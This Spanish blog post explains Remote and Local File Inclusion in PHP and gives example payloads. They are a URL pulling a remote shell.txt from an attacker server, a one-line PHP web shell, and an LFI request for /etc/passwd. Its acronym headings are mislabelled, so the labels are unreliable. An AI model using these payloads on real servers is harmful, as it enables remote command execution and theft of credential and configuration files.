FRI-(FILE REMOTE INCLUDE)
Remote file include es una técnica hacking la cual permite ejecutar archivos que no están almacenados en el servidor, esto quiere decir que si una página web es vulnerable a este tipo de ataques, podríamos ejecutar scripts remotamente y hacer mucho daño a la página he incluso al servidor, cabe aclarar que esta vulnerabilidad, solo está presente en páginas dinámicas programadas en php, ya que este lenguaje de lado del servidor permite incluir archivos remotos, un atacante, podría aprovechar esta vulnerabilidad por ejemplo para obtener una Shell en el servidor vulnerable mediante lo siguiente:
http://[servidor_victima]/index.php?page=http://[servidor_atacante]/shell.txt&&cmd=ls
Pudiendo contener el archivo shell.txt cualquier código, por ejemplo:
<?
system($cmd);
?>
El archivo debe tener una extensión distinta a cualquier otra que se pueda ejecutar en el servidor del atacante (.txt,.gif, etc), una extensión “.php” no sería válida, ya que en el servidor víctima al incluir el fichero con extensión.php se estaría ejecutando antes el código php en el servidor del atacante; recordemos que el código php se ejecuta en el servidor y el usuario solo puede ver el resultado, es por esto que el código del script malicioso debe ir con una extensión distinta, ya que la función include, require, require_once, include_once ejecutaría el código PHP contenido en el fichero que se pasa como parámetro a la función, sin importar la extensión que tenga.
LRI (LOCAL REMOTE INCLUDE)
Local remote include es una técnica hacking la cual permite navegar por los directorios de la página o del servidor y a su vez nos permite ejecutar los archivos contenidos por los mismos un ejemplo de una vulnerabilidad LFI es la siguiente:
Un sitio incluye un archivo de una forma similar a esta
http://[servidor_victima]/index.php?page=plantilla.html
- El cual puede ser explotado así:
http://[servidor_victima]//index.php?page=/etc/passwd
– entre muchas cosas que podemos obtener de un ataque LFI (archivos de conexión a bases de datos, scripts privados etc.) - /etc/passwd —> Fichero de contraseñas Linux.
0 comentarios:
Publicar un comentario